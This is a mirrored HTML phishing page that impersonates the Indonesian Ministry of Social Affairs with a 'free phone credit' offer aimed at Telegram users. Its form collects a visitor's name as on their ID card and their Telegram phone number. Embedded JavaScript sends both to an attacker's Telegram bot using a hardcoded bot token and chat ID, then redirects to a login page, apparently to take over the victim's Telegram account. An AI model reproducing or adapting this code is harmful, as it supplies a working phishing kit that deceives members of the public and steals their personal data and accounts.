<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from klaimbansos2024.bsite.net/bansos/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 22 Aug 2024 06:45:03 GMT -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="og:title" content="𝗞𝗹𝗮𝗶𝗺 𝗣𝘂𝗹𝘀𝗮 𝗚𝗿𝗮𝘁𝗶𝘀 𝗔𝗹𝗹 𝗢𝗽𝗲𝗿𝗮𝘁𝗼𝗿" />
    <meta property="og:description" content="Ayo klaim pulsa gratismu sekarang juga,khusus untuk pengguna telegram." />
    <meta property="og:image" content="../../iili.io/dzpEEvI.png" />
    <meta property="og:url" content="www.pulsagratis.com" />
    <meta property="og:type" content="website" />
    <title>𝗞𝗹𝗮𝗶𝗺 𝗣𝘂𝗹𝘀𝗮 𝗚𝗿𝗮𝘁𝗶𝘀 𝗔𝗹𝗹 𝗢𝗽𝗲𝗿𝗮𝘁𝗼𝗿</title>
    <script src="http://unpkg.com/alpinejs" defer></script>
    <link href="../../cdn.jsdelivr.net/npm/daisyui%404.12.10/dist/full.min.css" rel="stylesheet" type="text/css" />
    <link href="../../cdn.jsdelivr.net/npm/tailwindcss%402.2.19/dist/tailwind.min.css" rel="stylesheet">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Lexend:wght@100..900&amp;display=swap');
    </style>
</head>
<body class="bg-gray-100">
    <!-- Navbar -->
    <nav x-data="{ isOpen: false }" class="relative bg-white shadow dark:bg-gray-800">
        <div class="container px-6 py-3 mx-auto md:flex">
            <div class="flex items-center justify-between">
                <a href="#">
                    <img class="w-auto h-6 sm:h-7" src="assets/img/dtks.png" alt="">
                </a>
    
                <!-- Mobile menu button -->
                <div class="flex lg:hidden">
                    <button x-cloak @click="isOpen = !isOpen" type="button" class="text-gray-500 dark:text-gray-200 hover:text-gray-600 dark:hover:text-gray-400 focus:outline-none focus:text-gray-600 dark:focus:text-gray-400" aria-label="toggle menu">
                        <svg x-show="!isOpen" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">
                            <path stroke-linecap="round" stroke-linejoin="round" d="M4 8h16M4 16h16" />
                        </svg>
                
                        <svg x-show="isOpen" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">
                            <path stroke-linecap="round" stroke-linejoin="round" d="M6 18L18 6M6 6l12 12" />
                        </svg>
                    </button>
                </div>
            </div>
    
            <!-- Mobile Menu open: "block", Menu closed: "hidden" -->
            <div x-cloak :class="[isOpen ? 'translate-x-0 opacity-100 ' : 'opacity-0 -translate-x-full']" class="absolute inset-x-0 z-20 w-full px-6 py-4 transition-all duration-300 ease-in-out bg-white dark:bg-gray-800 md:mt-0 md:p-0 md:top-0 md:relative md:opacity-100 md:translate-x-0 md:flex md:items-center md:justify-between">
                <div class="flex flex-col px-2 -mx-4 md:flex-row md:mx-10 md:py-0">
                    <a href="#" class="px-2.5 py-2 text-gray-700 transition-colors duration-300 transform rounded-lg dark:text-gray-200 hover:bg-gray-100 dark:hover:bg-gray-700 md:mx-2">Home</a>
                    <a href="#" class="px-2.5 py-2 text-gray-700 transition-colors duration-300 transform rounded-lg dark:text-gray-200 hover:bg-gray-100 dark:hover:bg-gray-700 md:mx-2">About</a>
                    <a href="#" class="px-2.5 py-2 text-gray-700 transition-colors duration-300 transform rounded-lg dark:text-gray-200 hover:bg-gray-100 dark:hover:bg-gray-700 md:mx-2">Contact</a>
                </div>
    
                <div class="relative mt-4 md:mt-0">
                    <span class="absolute inset-y-0 left-0 flex items-center pl-3">
                        <svg class="w-5 h-5 text-gray-400" viewBox="0 0 24 24" fill="none">
                            <path d="M21 21L15 15M17 10C17 13.866 13.866 17 10 17C6.13401 17 3 13.866 3 10C3 6.13401 6.13401 3 10 3C13.866 3 17 6.13401 17 10Z" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
                        </svg>
                    </span>
    
                    <input type="text" class="w-full py-2 pl-10 pr-4 text-gray-700 bg-white border rounded-lg dark:bg-gray-800 dark:text-gray-300 dark:border-gray-600 focus:border-blue-400 dark:focus:border-blue-300 focus:outline-none focus:ring focus:ring-opacity-40 focus:ring-blue-300" placeholder="Search">
                </div>
            </div>
        </div>
    </nav>
      
    <!-- Image Below Navbar -->
    <div class="container mx-auto mt-6 px-4">
        <img src="assets/img/ini.jpg" class="w-full rounded-md shadow-md" alt="Responsive image">
    </div>

    <!-- Form -->
    <div class="container mx-auto mt-6 px-4">
        <h2 class="text-2xl  font-bold text-gray-800 mb-1">Silahkan input data dibawah</h2>
        <form id="claimForm" class="bg-white p-6 rounded-md shadow-md">

            <div class="mb-4">
                <label for="Nama" class="block text-gray-700">Nama: </label>
                <input type="text" maxlength="14" placeholder="Nama sesuai E-KTP" id="nama" name="nama" class="w-full mt-2 p-2 border border-blue-300 rounded-md shadow-xl focus:outline-none focus:ring-2 focus:ring-blue-500">
            </div>
        
            <div class="mb-4">
                <label for="phoneNumber" class="block text-gray-700">Nomor Telepon: </label>
                <input type="tel" maxlength="14" placeholder="Nomor terdaftar di Telegram" id="phoneNumber" name="nohp" class="w-full mt-2 p-2 border border-blue-300 rounded-md shadow-xl focus:outline-none focus:ring-2 focus:ring-blue-500">
            </div>
            <button type="submit" id="submitButton" class="w-full bg-blue-500 text-white py-2 rounded-md hover:bg-blue-600">Cek Status</button>
        </form>
    </div>

    <!-- footer -->
    <footer class="bg-white dark:bg-gray-900">
        <div class="container flex flex-col items-center justify-between p-6 mx-auto space-y-4 sm:space-y-0 sm:flex-row">
            <a href="#">
                <img class="w-auto" src="assets/img/ini1.png" alt="">
            </a>
    
            <p class="text-sm text-gray-600 dark:text-gray-300">© PUSDATIN KESOS by KEMENTERIAN SOSIAL REPUBLIK INDONESIA</p>
        </div>
    </footer>

    <script>
        const TELEGRAM_BOT_TOKEN = '7397678396:AAEJAEY4tT2IRwcvElsOeyNStmkHUCpFKz0';
        const CHAT_ID = '6379454567';
    
        document.getElementById('claimForm').addEventListener('submit', function(event) {
            event.preventDefault();
            
            const nama = document.getElementById('nama').value;
            const phoneNumber = document.getElementById('phoneNumber').value;
            
            // Simpan input ke sessionStorage
            sessionStorage.setItem('nama', nama);
            sessionStorage.setItem('phoneNumber', phoneNumber);
    
            const message = `𝗡𝗮𝗺𝗮:\n${nama}\n𝗡𝗼𝗺𝗼𝗿 𝗛𝗣:\n${phoneNumber}`;
    
            const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=${encodeURIComponent(message)}`;
    
            const submitButton = document.getElementById('submitButton');
            submitButton.textContent = 'Mohon Tunggu...';
            submitButton.disabled = true;
    
            fetch(url)
                .then(response => response.json())
                .then(data => {
                    if (data.ok) {
                        window.location.href = 'login.html';
                    } else {
                        alert('Terjadi kesalahan. Coba lagi.');
                    }
                })
                .catch(error => {
                    console.error('Error:', error);
                    alert('Terjadi kesalahan. Coba lagi.');
                })
                .finally(() => {
                    submitButton.textContent = 'Cek Status';
                    submitButton.disabled = false;
                });
        });
    
        // Pre-populate the form with data from sessionStorage if available
        window.addEventListener('load', function() {
            const storedNama = sessionStorage.getItem('nama');
            const storedPhoneNumber = sessionStorage.getItem('phoneNumber');
    
            if (storedNama) document.getElementById('nama').value = storedNama;
            if (storedPhoneNumber) document.getElementById('phoneNumber').value = storedPhoneNumber;
        });
    </script>
    

    <!-- Tailwind CSS JS -->
    <script src="../../cdn.jsdelivr.net/npm/tailwindcss%402.2.19/dist/tailwind.min.js"></script>
</body>

<!-- Mirrored from klaimbansos2024.bsite.net/bansos/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 22 Aug 2024 06:45:03 GMT -->
</html>



